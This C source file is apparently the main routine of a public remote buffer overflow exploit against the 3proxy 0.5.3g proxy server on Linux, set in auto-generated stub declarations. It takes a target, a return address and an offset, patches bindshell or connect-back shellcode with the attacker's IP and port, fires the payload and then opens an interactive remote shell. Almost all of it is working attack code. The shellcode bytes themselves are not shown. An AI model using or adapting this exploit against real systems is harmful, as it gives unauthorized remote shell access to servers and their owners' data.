
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct hostent {scalar_t__ h_addr; } ;
typedef int s ;
typedef int in_addr_t ;
struct TYPE_2__ {int port; int sport; int addr; char* host; int off; } ;


 int DFL_PORT ;
 int DFL_RETADDR ;
 int DFL_SPORT ;
 int EOF ;
 void* atoi (int ) ;
 int exit (int ) ;
 struct hostent* gethostbyname (int ) ;
 int getopt (int,char**,char*) ;
 int getshell_bind_accept (int) ;
 int getshell_bind_init (int) ;
 int getshell_conn (char*,int) ;
 int inet_addr (int ) ;
 int memcpy (char*,char*,int) ;
 int optarg ;
 int printe (char*,int) ;
 int printf (char*,...) ;
 int proc_shell (int) ;
 int proxy_connect (char*,int) ;
 int sscanf (int ,char*,int*) ;
 scalar_t__ strdup (int ) ;
 unsigned int strlen (int*) ;
 TYPE_1__ tbl ;
 int usage (char*) ;
 int* x86_bind ;
 int* x86_conn ;
 int* x86_ptr ;

int main(int argc,char **argv){
 signed int chr=0,rsock=0;
 unsigned int bs=0;
 struct hostent *t;
 in_addr_t s=0;
 printf("[*] 3proxy[v0.5.3g]: (linux) remote buffer overflow explo"
 "it.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
 tbl.port=DFL_PORT;
 tbl.sport=DFL_SPORT;
 tbl.addr=DFL_RETADDR;

 while((chr=getopt(argc,argv,"h:p:s:c:r:+:"))!=EOF){
  switch(chr){
   case 'h':
    if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
     printe("main(): allocating memory failed",1);
    break;
   case 'p':
    tbl.port=atoi(optarg);
    break;
   case 's':
    tbl.sport=atoi(optarg);
    break;
   case 'c':
    if((s=inet_addr(optarg))){
     if((t=gethostbyname(optarg)))
      memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
     if(s==-1)s=0;
     if(!s)printe("invalid host/ip. (-c option)",0);
    }
    break;
   case 'r':
    sscanf(optarg,"%x",&tbl.addr);
    break;
   case '+':
    tbl.off=atoi(optarg);
    break;
   default:
    usage(argv[0]);
    break;
  }
 }
 if(!tbl.host)usage(argv[0]);


 if(!s){
  bs=strlen(x86_bind);
  x86_bind[20]=(tbl.sport&0xff00)>>8;
  x86_bind[21]=(tbl.sport&0x00ff);
  x86_ptr=x86_bind;
 }

 else{
  bs=strlen(x86_conn);
  x86_conn[33]=(s&0x000000ff);
  x86_conn[34]=(s&0x0000ff00)>>8;
  x86_conn[35]=(s&0x00ff0000)>>16;
  x86_conn[36]=(s&0xff000000)>>24;
  x86_conn[39]=(tbl.sport&0xff00)>>8;
  x86_conn[40]=(tbl.sport&0x00ff);
  x86_ptr=x86_conn;
 }
 if(bs!=strlen(x86_ptr))
  printe("ip(-c option) and/or port(-s option) appear to contain a "
  "null-byte, try again.",1);

 printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
 printf("[*] shellcode type\t\t: %s(port=%d)\n",
 (s?"connect-back":"bindshell"),tbl.sport);
 printf("[*] return address($eip)\t: 0x%.8x(+%d=0x%.8x)\n",tbl.addr,
 tbl.off,tbl.addr+tbl.off);

 if(s){
  rsock=getshell_bind_init(tbl.sport);
  proxy_connect(tbl.host,tbl.port);
  rsock=getshell_bind_accept(rsock);
 }
 else{
  proxy_connect(tbl.host,tbl.port);
  rsock=getshell_conn(tbl.host,tbl.sport);
 }
 if(rsock>0)proc_shell(rsock);
 exit(0);
}
